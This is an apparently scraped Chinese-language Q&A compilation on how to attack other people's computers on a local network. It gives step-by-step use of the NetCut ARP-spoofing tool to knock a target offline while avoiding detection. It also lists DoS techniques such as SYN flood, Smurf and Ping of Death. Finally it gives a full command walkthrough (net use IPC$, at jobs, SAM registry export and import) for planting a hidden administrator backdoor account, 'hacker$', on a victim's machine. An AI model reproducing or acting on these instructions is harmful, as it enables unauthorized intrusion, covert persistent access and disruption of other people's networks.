本文目录一览：

• 1、怎么攻击局域 *** 里的电脑？

• 2、dos攻击工具有哪些（局域网内）

• 3、谁知道怎样在局域网攻击别人电脑，或者有什么好的软件介绍个！

怎么攻击局域 *** 里的电脑？

*** 剪刀手。

用法也比较简单

我看二楼的说的 *** 执法官我以前试过/

用处不是太大。

只要保证你们用的是同一台陆游器

就能让他掉线。

他必须得重起才能停止攻击

想怎么整他就怎么整他。。。

哈哈`

但是别被发现咯``

被发现的话就不好说了。。。下面是具体使用 ***

利用ARP协议， *** 剪刀手（NetCut

1.51）可以切断局域网里任何主机和网关之间的连接，使其断开与Internet的连接，同时也可以看到局域网内所有主机的IP地址和MAC地址。

安装使用非常简单，跟我来吧！

1.

安装NetCut，如果您的系统是Windows

9x，还需要重新启动。

2.

运行Netcut，系统开始对整个网段进行IP探测。

3.

一般情况下，Netcut可以检测出局域网内正在使用的IP

地址，以及所对应的用户名和MAC地址（见附图）。

4.

选中你想断开的局域网主机，如想多选请按住Shift

键。

5.

点击[剪断]，被选主机就不能通过NetCut

上显示的网关来上网了。想恢复连接的话，就点击[恢复]按钮， *** 可以马上恢复正常

去baidu搜索 *** 剪刀

大把大把的等你下载.

dos攻击工具有哪些（局域网内）

ARP欺骗？可以用局域网终结者。就是ping也成啊！我比较喜欢用局域网终结者（ARP欺骗）和cmd的ping命令。但是如果别人有抗ARP欺骗的防火墙就没办法了（比如360防火墙）。 百度的资料……DoS攻击 ***

Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包，而在收到目的主机的SYN ACK后并不回应，这样，目的主机就为这些源主机建立了大量的连接队列，而且由于没有收到ACK一直维护着这些队列，造成了资源的大量消耗而不能向正常请求提供服务。

Smurf：该攻击向一个子网的广播地址发一个带有特定请求（如ICMP回应请求）的包，并且将源地址伪装成想要攻击的主机地址。子网上所有主机都回应广播包请求而向被攻击主机发包，使该主机受到攻击。

Land-based：攻击者将一个包的源地址和目的地址都设置为目标主机的地址，然后将该包通过IP欺骗的方式发送给被攻击主机，这种包可以造成被攻击主机因试图与自己建立连接而陷入死循环，从而很大程度地降低了系统性能。

Ping of Death：根据TCP/IP的规范，一个包的长度更大为65536字节。尽管一个包的长度不能超过65536字节，但是一个包分成的多个片段的叠加却能做到。当一个主机收到了长度大于65536字节的包时，就是受到了Ping of Death攻击，该攻击会造成主机的宕机。

Teardrop：IP数据包在 *** 传递时，数据包可以分成更小的片段。攻击者可以通过发送两段（或者更多）数据包来实现TearDrop攻击。之一个包的偏移量为0，长度为N，第二个包的偏移量小于N。为了合并这些数据段，TCP/IP堆栈会分配超乎寻常的巨大资源，从而造成系统资源的缺乏甚至机器的重新启动。

PingSweep：使用ICMP Echo轮询多个主机。

Pingflood: 该攻击在短时间内向目的主机发送大量ping包，造成 *** 堵塞或主机资源耗尽。

谁知道怎样在局域网攻击别人电脑，或者有什么好的软件介绍个！

我可以告诉你一个办法不过需要对象的用户名和口令，还要知道他的IP

地址，只要你知道拿到账号和密码半个小时就可以搞定，以后你就有一个自己的隐藏管理员账户，随便进入他的电脑。

在这里将用at的命令，因为用at产生的计划任务是以系统身份运行的，所以也用不到psu.exe程序。为了能够使用at命令，肉鸡必须开有schedule的服务，如果没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，当然其 *** 也可以，只要能启动schedule服务就行。

对于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet服务，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以。

1．这里先假设他的用户名为administrator,密码为12345678，现在我们开始在命令行下远程为它建立隐藏的超级用户。（假设主机是局域网内的一台主机，ip地址为13.50.97.238,。）

2．先与他建立连接：

net

use

\\13.50.97.238\ipc$

"12345678"

/user："Administrator”

3．用at命令在他的电脑建立一个用户(如果at服务没有启动，可用netsvc.exe或sc.exe来远程启动)：

at

\\13.50.97.238

12:51

c:\windows\system32\net.exe

user

hacker$

1234

/add

建立这个加有$符的用户名，是因为加有$符后，命令行下用net

user将不显示这个用户，但在帐户管理器却能看到这个用户。

4．同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值：

at

\\13.50.97.238

12:55

c:\windows\regedit.exe

/e

hacker.reg

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users

/e

是regedit.exe的参数，在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe

/e

hacker.reg

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users"引起来。

5．将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为：

Copy

\\13.50.97.238\admin$\system32\hacker.reg

c:\hacker.reg

6．再将编辑好的hacker.reg拷回他的电脑上

copy

c:\hacker.reg

\\13.50.97.238\admin$\system32\hacker1.reg

7．查看他的电脑时间：net

time

\\13.50.97.238然后用at命令将用户hacker$删除：

at

\\13.50.97.238

13:40

net

user

hacker$

/del

8．验证hacker$是否删除:net

use

\\13.50.97.238

/del

断开与他的电脑连接。

再用net

use

\\13.50.97.238\ipc$

"1234"

/user:"hacker$"

用帐户hacker$与他电脑连接，不能连接说明已删除。

9．再与他电脑建立连接：

net

use

\\13.50.97.238\ipc$

"12345678"

/user:"administrator"

再取得他的时间，用at命令将拷回他的hacker1.reg导入他的注册表:

at

\\13.50.97.238

13:41

c:\windows\regedit.exe

/s

hacker1.reg

regedit.exe的参数/s是指安静模式。

10．再验证hacker$是否已建立， *** 同上面验证hacker$是否被删除一样。

11．再验证用户hacker$是否有读、写、删除的权限，如果不放心，你还可验证是否能建立其它帐户。

12．通过步骤11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删除的权限。

OK

以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~~